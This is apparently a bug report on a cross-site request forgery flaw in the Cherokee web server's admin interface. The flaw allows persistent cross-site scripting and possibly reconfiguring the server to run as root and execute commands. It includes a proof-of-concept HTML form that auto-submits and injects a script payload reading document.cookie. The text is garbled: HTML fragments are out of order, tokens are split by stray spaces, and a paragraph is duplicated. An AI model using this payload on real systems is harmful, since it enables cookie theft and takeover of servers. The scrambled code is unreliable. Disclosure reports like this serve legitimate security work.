A Worst case scenario could be something like the following:
If a user is logged in and the cherokee admin server is running on localhost:9090 then if they visit a $bad page which sends post requests to the cherokee admin server - the bad page may be able to send requests to the server so as to reconfigure it to:
1. run as root
2. the logging of error(or access) will run a command ...
Binary package hint: cherokee
The cherokee admin server is vulnerable to csrf.
Using csrf it is possible to produce a persistent xss in several pages in at least the 'status' page.
An example of this is the following:
<html> 127.0.0. 1:9090/ vserver/ apply" method="post" id="xssform"> new_droot" value=' /var/www/ '></input> :alert( document. cookie) ">'></input> document. getElementById( "xssform" ).submit( );</script>
<body>
<form action="http://
<input type="text" name="tmp!
<input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript
</form>
<script>
</body>
A Worst case scenario could be something like the following:
If a user is logged in and the cherokee admin server is running on localhost:9090 then if they visit a $bad page which sends post requests to the cherokee admin server - the bad page may be able to send requests to the server so as to reconfigure it to:
1. run as root
2. the logging of error(or access) will run a command ...